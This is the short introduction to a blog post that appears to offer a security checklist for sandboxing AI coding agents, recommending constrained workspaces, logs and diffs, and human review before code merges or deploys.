Treat AI Coding Agents Like Untrusted Interns: A Practical Sandbox Checklist

AI coding agents are getting useful enough that teams are letting them inspect repos, edit files, run commands, open pull requests, and sometimes talk to internal tools. That is a big productivity win — but it also changes the security model.

A normal developer workstation assumes the person at the keyboard understands context. An agent does not. It can follow a poisoned README, execute a risky script, leak environment variables into logs, or install a package that does more than expected.

The practical answer is not "never use agents." The answer is: treat every agent session as an untrusted autonomous workload and give it the smallest workspace it needs.

This post is a concise checklist you can apply today.

At a high level, the safe pattern is simple: keep the agent inside a constrained workspace, collect logs and diffs, and put a human review gate before anything merges or deploys.